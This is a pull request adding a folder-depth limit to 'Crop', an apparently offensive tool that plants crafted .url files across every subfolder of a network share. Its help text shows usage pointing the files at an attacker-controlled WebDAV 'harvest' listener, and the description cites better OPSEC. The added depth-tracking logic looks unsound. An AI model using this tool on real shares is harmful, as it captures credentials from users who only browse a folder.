### PR TITLE
 Added recursive depth supported to the Crop tool

### DIFF
--- a/crop/Crop/Config.cs
+++ b/crop/Crop/Config.cs
@@ -25,11 +25,12 @@ namespace Crop
 
 
 
-        public static void WalkDirectoryTree(string root)
+        public static void WalkDirectoryTree(string root, int maxDepth)
         {
             Stack<string> dirs = new Stack<string>();
+            var currentDepth = 0;
 
-            Console.WriteLine("[*] Walking directory tree for: " + root);
+            Console.WriteLine("[*] Walking directory tree for: {0} until a depth of {1}", root, maxDepth > 0 ? maxDepth.ToString() : "infinity");
             if (!System.IO.Directory.Exists(root))
             {
                 Console.WriteLine("[!] Error, folder does not exist");
@@ -37,10 +38,9 @@ namespace Crop
             }
             dirs.Push(root);
             folders.Add(root);
-
-            while (dirs.Count > 0)
+            
+            while (dirs.Count > 0 && (maxDepth < 0 || currentDepth < maxDepth))
             {
-
                 string currentDir = dirs.Pop();
                 string[] subDirs;
                 try
@@ -66,6 +66,9 @@ namespace Crop
                     Console.WriteLine(e.Message);
                     continue;
                 }
+
+                // Track depth
+                currentDepth += subDirs.Length == 0 ? -1 : 1;
 
                 // Push the subdirectories onto the stack for traversal.
                 // This could also be done before handing the files.

--- a/crop/Crop/Program.cs
+++ b/crop/Crop/Program.cs
@@ -24,6 +24,7 @@ namespace Crop
             Console.WriteLine("crop.exe \\\\fileserver\\Common\\ crop.url \\\\workstation@8888\\harvest");
             Console.WriteLine("\nOptional arguments:");
             Console.WriteLine("--recurse : write the file to every sub folder of the specified path");
+            Console.WriteLine("--depth=X : number of sub folders deep of the specified path to write the file");
             Console.WriteLine("--clean : remove the file from every sub folder of the specified path");
             return;
         }
@@ -31,10 +32,19 @@ namespace Crop
         {
             var recurse = false;
             var clean = false;
+            var maxDepth = -1;
             if (args.Contains("--recurse"))
                 recurse = true;
             else if (args.Contains("--clean"))
                 clean = true;
+            
+            if (Array.Exists(args,  x => x.Contains("--depth=")))
+            {
+                if (!Int32.TryParse(args.Where(s => s.Contains("--depth=")).First().Split('=')[1], out maxDepth)) {
+                    ShowHelp();
+                    return;
+                }
+            }
 
             Config.targetLocation = args[0].Trim();
             Config.targetFilename = args[1].Trim();
@@ -59,7 +69,7 @@ namespace Crop
                 {
                     if (recurse)
                     {
-                        Config.WalkDirectoryTree(Config.targetLocation);
+                        Config.WalkDirectoryTree(Config.targetLocation, maxDepth);
                         foreach (var folder in Config.folders)
                         {
                             var f = folder;
@@ -72,7 +82,7 @@ namespace Crop
                     }
                     else if (clean)
                     {
-                        Config.WalkDirectoryTree(Config.targetLocation);
+                        Config.WalkDirectoryTree(Config.targetLocation, maxDepth);
                         foreach (var folder in Config.folders)
                         {
                             var f = folder;
@@ -106,7 +116,7 @@ namespace Crop
 
                     if (recurse)
                     {
-                        Config.WalkDirectoryTree(Config.targetLocation);
+                        Config.WalkDirectoryTree(Config.targetLocation, maxDepth);
                         foreach (var folder in Config.folders)
                         {
                             var f = folder;
@@ -119,7 +129,7 @@ namespace Crop
                     }
                     else if (clean)
                     {
-                        Config.WalkDirectoryTree(Config.targetLocation);
+                        Config.WalkDirectoryTree(Config.targetLocation, maxDepth);
                         foreach (var folder in Config.folders)
                         {
                             var f = folder;


### PR DESCRIPTION
Added support to only go a specific recursive depth deep when using the recurse parameter. For example --depth=2 will only ever go 2 folders deep on the specified share. 

This can be useful to improve performance on large shares, and provide better OPSEC.